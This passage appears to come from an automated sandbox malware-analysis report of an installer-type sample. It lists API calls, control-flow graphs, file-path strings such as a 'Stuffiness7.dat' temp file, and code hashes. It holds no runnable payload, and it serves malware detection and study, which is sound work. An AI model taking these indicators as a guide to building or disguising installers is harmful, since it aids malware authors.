                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405A61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                • String ID: {
                                                                                                                                                                                                                                • API String ID: 4154960007-366298937
                                                                                                                                                                                                                                • Opcode ID: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
                                                                                                                                                                                                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 192 403f9a-403fac 193 403fb2-403fb8 192->193 194 404113-404122 192->194 193->194 195 403fbe-403fc7 193->195 196 404171-404186 194->196 197 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 194->197 201 403fc9-403fd6 SetWindowPos 195->201 202 403fdc-403fe3 195->202 199 4041c6-4041cb call 4044e5 196->199 200 404188-40418b 196->200 197->196 214 4041d0-4041eb 199->214 204 40418d-404198 call 401389 200->204 205 4041be-4041c0 200->205 201->202 207 403fe5-403fff ShowWindow 202->207 208 404027-40402d 202->208 204->205 231 40419a-4041b9 SendMessageW 204->231 205->199 213 404466 205->213 215 404100-40410e call 404500 207->215 216 404005-404018 GetWindowLongW 207->216 210 404046-404049 208->210 211 40402f-404041 DestroyWindow 208->211 221 40404b-404057 SetWindowLongW 210->221 222 40405c-404062 210->222 219 404443-404449 211->219 220 404468-40446f 213->220 225 4041f4-4041fa 214->225 226 4041ed-4041ef call 40140b 214->226 215->220 216->215 217 40401e-404021 ShowWindow 216->217 217->208 219->213 227 40444b-404451 219->227 221->220 222->215 230 404068-404077 GetDlgItem 222->230 228 404200-40420b 225->228 229 404424-40443d DestroyWindow EndDialog 225->229 226->225 227->213 234 404453-40445c ShowWindow 227->234 228->229 235 404211-40425e call 40657a call 404499 * 3 GetDlgItem 228->235 229->219 236 404096-404099 230->236 237 404079-404090 SendMessageW IsWindowEnabled 230->237 231->220 234->213 264 404260-404265 235->264 265 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 235->265 239 40409b-40409c 236->239 240 40409e-4040a1 236->240 237->213 237->236 242 4040cc-4040d1 call 404472 239->242 243 4040a3-4040a9 240->243 244 4040af-4040b4 240->244 242->215 247 4040ea-4040fa SendMessageW 243->247 248 4040ab-4040ad 243->248 244->247 249 4040b6-4040bc 244->249 247->215 248->242 252 4040d3-4040dc call 40140b 249->252 253 4040be-4040c4 call 40140b 249->253 252->215 262 4040de-4040e8 252->262 260 4040ca 253->260 260->242 262->260 264->265 268 4042a6-4042a7 265->268 269 4042a9 265->269 270 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 268->270 269->270 271 4042db-4042ec SendMessageW 270->271 272 4042ee 270->272 273 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 271->273 272->273 273->214 284 404339-40433b 273->284 284->214 285 404341-404345 284->285 286 404364-404378 DestroyWindow 285->286 287 404347-40434d 285->287 286->219 289 40437e-4043ab CreateDialogParamW 286->289 287->213 288 404353-404359 287->288 288->214 290 40435f 288->290 289->219 291 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 289->291 290->213 291->213 296 40440a-40441d ShowWindow call 4044e5 291->296 298 404422 296->298 298->219
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 121052019-0
                                                                                                                                                                                                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 299 403bec-403c04 call 40690a 302 403c06-403c16 call 406484 299->302 303 403c18-403c4f call 40640b 299->303 311 403c72-403c9b call 403ec2 call 405f14 302->311 307 403c51-403c62 call 40640b 303->307 308 403c67-403c6d lstrcatW 303->308 307->308 308->311 317 403ca1-403ca6 311->317 318 403d2d-403d35 call 405f14 311->318 317->318 319 403cac-403cd4 call 40640b 317->319 323 403d43-403d68 LoadImageW 318->323 324 403d37-403d3e call 40657a 318->324 319->318 329 403cd6-403cda 319->329 327 403de9-403df1 call 40140b 323->327 328 403d6a-403d9a RegisterClassW 323->328 324->323 342 403df3-403df6 327->342 343 403dfb-403e06 call 403ec2 327->343 332 403da0-403de4 SystemParametersInfoW CreateWindowExW 328->332 333 403eb8 328->333 330 403cec-403cf8 lstrlenW 329->330 331 403cdc-403ce9 call 405e39 329->331 337 403d20-403d28 call 405e0c call 40653d 330->337 338 403cfa-403d08 lstrcmpiW 330->338 331->330 332->327 336 403eba-403ec1 333->336 337->318 338->337 341 403d0a-403d14 GetFileAttributesW 338->341 345 403d16-403d18 341->345 346 403d1a-403d1b call 405e58 341->346 342->336 352 403e0c-403e26 ShowWindow call 40689a 343->352 353 403e8f-403e90 call 405672 343->353 345->337 345->346 346->337 360 403e32-403e44 GetClassInfoW 352->360 361 403e28-403e2d call 40689a 352->361 356 403e95-403e97 353->356 358 403eb1-403eb3 call 40140b 356->358 359 403e99-403e9f 356->359 358->333 359->342 366 403ea5-403eac call 40140b 359->366 364 403e46-403e56 GetClassInfoW RegisterClassW 360->364 365 403e5c-403e7f DialogBoxParamW call 40140b 360->365 361->360 364->365 369 403e84-403e8d call 403b3c 365->369 366->342 369->336
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F73420), ref: 00403CED
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,00000000,?), ref: 00403D0B
                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                                                                                                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                • API String ID: 1975747703-2823021303
                                                                                                                                                                                                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 373 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 376 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 373->376 377 4030cd-4030d2 373->377 385 4031f0-4031fe call 403019 376->385 386 40310b 376->386 378 4032ad-4032b1 377->378 392 403200-403203 385->392 393 403253-403258 385->393 388 403110-403127 386->388 390 403129 388->390 391 40312b-403134 call 4034cf 388->391 390->391 399 40325a-403262 call 403019 391->399 400 40313a-403141 391->400 395 403205-40321d call 4034e5 call 4034cf 392->395 396 403227-403251 GlobalAlloc call 4034e5 call 4032b4 392->396 393->378 395->393 419 40321f-403225 395->419 396->393 424 403264-403275 396->424 399->393 404 403143-403157 call 405fe8 400->404 405 4031bd-4031c1 400->405 410 4031cb-4031d1 404->410 422 403159-403160 404->422 409 4031c3-4031ca call 403019 405->409 405->410 409->410 415 4031e0-4031e8 410->415 416 4031d3-4031dd call 4069f7 410->416 415->388 423 4031ee 415->423 416->415 419->393 419->396 422->410 428 403162-403169 422->428 423->385 425 403277 424->425 426 40327d-403282 424->426 425->426 429 403283-403289 426->429 428->410 430 40316b-403172 428->430 429->429 431 40328b-4032a6 SetFilePointer call 405fe8 429->431 430->410 432 403174-40317b 430->432 436 4032ab 431->436 432->410 433 40317d-40319d 432->433 433->393 435 4031a3-4031a7 433->435 437 4031a9-4031ad 435->437 438 4031af-4031b7 435->438 436->378 437->423 437->438 438->410 439 4031b9-4031bb 438->439 439->410
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                                                                                • API String ID: 2803837635-179649033
                                                                                                                                                                                                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040559F Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 504 40559f-4055b4 505 4055ba-4055cb 504->505 506 40566b-40566f 504->506 507 4055d6-4055e2 lstrlenW 505->507 508 4055cd-4055d1 call 40657a 505->508 510 4055e4-4055f4 lstrlenW 507->510 511 4055ff-405603 507->511 508->507 510->506 512 4055f6-4055fa lstrcatW 510->512 513 405612-405616 511->513 514 405605-40560c SetWindowTextW 511->514 512->511 515 405618-40565a SendMessageW * 3 513->515 516 40565c-40565e 513->516 514->513 515->516 516->506 517 405660-405663 516->517 517->506
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
